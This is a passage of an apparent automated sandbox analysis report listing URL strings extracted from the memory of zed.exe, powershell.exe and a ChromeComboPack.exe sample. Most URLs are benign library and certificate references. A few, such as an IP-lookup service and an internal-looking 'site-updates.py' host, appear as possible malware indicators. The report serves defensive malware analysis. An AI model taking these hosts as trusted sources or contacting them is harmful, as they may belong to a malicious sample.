00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019558613.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026192491.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026506251.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3016784415.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024919479.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019558613.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026506251.0000019AE1690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: zed.exe, 0000000C.00000002.4736377596.00000132F86E0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736137366.00000132F85E0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3081633521.00000132F8472000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
Source: powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740170642.00000132F9667000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
Source: powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.4741697049.000001EE16D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3075589371.000002B03F11F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3166041238.0000025B4B651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: zed.exe, 00000007.00000003.3198438648.0000019AE1690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tango.freedesktop.org/Tango_Desktop_Project
Source: zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4880
Source: zed.exe, 0000000C.00000002.4745134537.00000132F9F70000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4744481462.00000132F9EA8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5297
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5869
Source: zed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: zed.exe, 0000000C.00000002.4740870539.00000132F97BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
Source: zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
Source: powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: zed.exe, 0000000C.00000002.4736377596.00000132F86E0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3081633521.00000132F8472000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740870539.00000132F982D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3015925774.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019498294.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3023684524.0000019AE169D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: zed.exe, 0000000C.00000002.4740739040.00000132F9775000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
Source: zed.exe, 0000000C.00000003.3087129020.00000132F89A0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F89A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: zed.exe, 0000000C.00000002.4740870539.00000132F97BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ietf.org/rfc/rfb
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ietf.org/rfc/rfc1421.txt
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ietf.org/rfc/rfc1423.txt
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ietf.org/rfc/rfc3447.txt
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ietf.org/rfc/rfc5208.txt
Source: powershell.exe, 0000000A.00000002.3080499160.000002B0571AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.4876531934.000001EE2F4F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coK
Source: zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
Source: zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
Source: zed.exe, 0000000C.00000002.4740870539.00000132F97BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rfc-editor.org/info/rfc7253
Source: zed.exe, 0000000C.00000002.4740870539.00000132F982D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
Source: zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4761922586.00007FFDA3348000.00000008.00000001.01000000.00000020.sdmpString found in binary or memory: http://www.zlib.net/D
Source: zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
Source: powershell.exe, 00000000.00000002.4871936149.000001EE2F106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://.VisualC
Source: powershell.exe, 00000000.00000002.4741697049.000001EE16D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3075589371.000002B03F139000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3075589371.000002B03F14C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.4741697049.000001EE178C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
Source: zed.exe, 0000000C.00000002.4745134537.00000132F9FA4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
Source: zed.exe, 0000000C.00000002.4739426340.00000132F8DE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue44497.
Source: zed.exe, 0000000C.00000002.4762266975.00007FFDA34EC000.00000002.00000001.01000000.0000001C.sdmpString found in binary or memory: https://cffi.readthedocs.io/en/latest/using.html#callbacks
Source: powershell.exe, 00000000.00000002.4854162268.000001EE26D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.4854162268.000001EE26D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.4854162268.000001EE26D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: zed.exe, 00000007.00000003.3198438648.0000019AE1690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://creativecommons.org/licenses/by-sa/3.0/)
Source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-file
Source: zed.exe, 0000000C.00000003.3081131778.00000132F83DA000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3090542361.00000132F8375000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: zed.exe, 0000000C.00000003.3074629659.00000132F7F1D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4732439462.00000132F7D4C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: zed.exe, 0000000C.00000002.4732439462.00000132F7CD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: zed.exe, 0000000C.00000002.4732439462.00000132F7D4C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: zed.exe, 0000000C.00000002.4732439462.00000132F7D4C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: zed.exe, 0000000C.00000002.4732439462.00000132F7D4C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: zed.exe, 0000000C.00000002.4732439462.00000132F7CD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: zed.exe, 0000000C.00000002.4734251410.00000132F80E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: zed.exe, 0000000C.00000002.4734251410.00000132F80E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: zed.exe, 0000000C.00000002.4732439462.00000132F7D4C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: zed.exe, 0000000C.00000002.4733711080.00000132F7EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3090542361.00000132F8483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://flak.tedunangst.com/post/new-openssh-key-format-and-bcrypt-pbkdf
Source: zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
Source: zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: zed.exe, 0000000C.00000002.4733711080.00000132F7EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
Source: ChromeComboPack.exeString found in binary or memory: https://github.com/mhammond/pywin32
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/openssl/openssl/blob/master/include/openssl/pem.h
Source: zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/platformdirs/platformdirs
Source: zed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/pull/6710
Source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
Source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues/8996
Source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues/9253
Source: zed.exe, 0000000C.00000002.4736377596.00000132F86E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packaging
Source: zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
Source: zed.exe, 0000000C.00000002.4739426340.00000132F8DE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
Source: zed.exe, 0000000C.00000002.4739426340.00000132F8DE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml
Source: zed.exe, 0000000C.00000002.4732439462.00000132F7CD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: zed.exe, 0000000C.00000002.4733711080.00000132F7EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: zed.exe, 0000000C.00000002.4733711080.00000132F7EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: zed.exe, 0000000C.00000003.3081131778.00000132F83DA000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4733711080.00000132F7EF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: zed.exe, 0000000C.00000002.4733711080.00000132F7EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: zed.exe, 0000000C.00000002.4739872009.00000132F90F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: zed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4733711080.00000132F7EF4000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8976000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: zed.exe, 0000000C.00000002.4733711080.00000132F7EF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
Source: zed.exe, 0000000C.00000002.4739872009.00000132F90F0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740170642.00000132F96B3000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
Source: zed.exe, 0000000C.00000002.4736377596.00000132F86E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
Source: zed.exe, 0000000C.00000002.4738469312.00000132F8AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
Source: zed.exe, 0000000C.00000002.4743750597.00000132F9AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linuxreviews.org/HOWTO_change_the_mouse_speed_
Source: zed.exe, 0000000C.00000003.3084201791.00000132F88FC000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3087129020.00000132F88DD000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3084052929.00000132F895F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3085033089.00000132F8907000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
Source: powershell.exe, 00000000.00000002.4854162268.000001EE26D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
Source: zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/guides/packaging-namespace-packages/.
Source: zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/
Source: zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/
Source: zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/All
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3087129020.00000132F8A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-the
Source: zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4739426340.00000132F8DE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: zed.exe, 0000000C.00000002.4735816641.00000132F84E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
Source: zed.exe, 0000000C.00000002.4754569858.00007FFD8B3F2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
Source: zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0685/
Source: zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4739426340.00000132F8DE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/build/).
